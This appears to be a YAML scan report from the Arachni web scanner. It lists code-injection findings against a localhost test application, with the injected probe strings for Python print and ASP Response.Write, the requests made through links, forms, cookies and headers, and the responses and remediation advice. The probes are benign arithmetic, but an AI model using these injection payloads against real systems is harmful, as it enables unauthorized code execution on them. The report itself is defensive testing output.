tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128 :follow_location: true :injected: default;print 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128 :action: http://localhost:6875/python/link/append?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/python/link/append?input=default injected: default;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/python/link/straight?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128 :follow_location: true :injected: ;print 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128 :action: http://localhost:6875/python/link/straight?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/python/link/straight?input=default injected: ;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:6875/python/cookie/straight elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ;print 287630581954+4196403186331128 :injected: ;print 287630581954+4196403186331128 :combo: !binary "Y29va2ll": ;print 287630581954+4196403186331128 :action: http://localhost:6875/python/cookie/straight :verification: false :id: '4196690816913082' var: cookie url: http://localhost:6875/python/cookie/straight injected: ;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=%3Bprint+287630581954%2B4196403186331128;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie2 url: http://localhost:6875/python/cookie/append elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128 :injected: cookie value;print 287630581954+4196403186331128 :combo: !binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128 :action: http://localhost:6875/python/cookie/append :verification: false :id: '4196690816913082' var: cookie2 url: http://localhost:6875/python/cookie/append injected: cookie value;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/python/header/append elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128 :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user;print 287630581954+4196403186331128 :injected: arachni_user;print 287630581954+4196403186331128 :combo: User-Agent: arachni_user;print 287630581954+4196403186331128 :action: http://localhost:6875/python/header/append :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/python/header/append injected: arachni_user;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user;print 287630581954+4196403186331128 Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/python/header/straight elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128 :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;print 287630581954+4196403186331128 :injected: ;print 287630581954+4196403186331128 :combo: User-Agent: ;print 287630581954+4196403186331128 :action: http://localhost:6875/python/header/straight :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/python/header/straight injected: ;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;print 287630581954+4196403186331128 Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzowNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/asp/form/append elem: form method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;Response.Write(287630581954+4196403186331128) :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128) :follow_location: true :injected: default;Response.Write(287630581954+4196403186331128) :combo: !binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128) :action: http://localhost:6875/asp/form/append :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/asp/form/append injected: default;Response.Write(287630581954+4196403186331128) id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/asp/form/straight elem: form method: POST name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ! '";Response.Write(287630581954+4196403186331128)#' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! '";Response.Write(287630581954+4196403186331128)#' :follow_location: true :injected: ! '";Response.Write(287630581954+4196403186331128)#' :combo: !binary "aW5wdXQ=": ! '";Response.Write(287630581954+4196403186331128)#' :action: http://localhost:6875/asp/form/straight :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/asp/form/straight injected: ! '";Response.Write(287630581954+4196403186331128)#' id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: POST response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/asp/link/straight?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;Response.Write(287630581954+4196403186331128) :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;Response.Write(287630581954+4196403186331128) :follow_location: true :injected: ;Response.Write(287630581954+4196403186331128) :combo: !binary "aW5wdXQ=": ;Response.Write(287630581954+4196403186331128) :action: http://localhost:6875/asp/link/straight?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/asp/link/straight?input=default injected: ;Response.Write(287630581954+4196403186331128) id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/asp/link/append?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
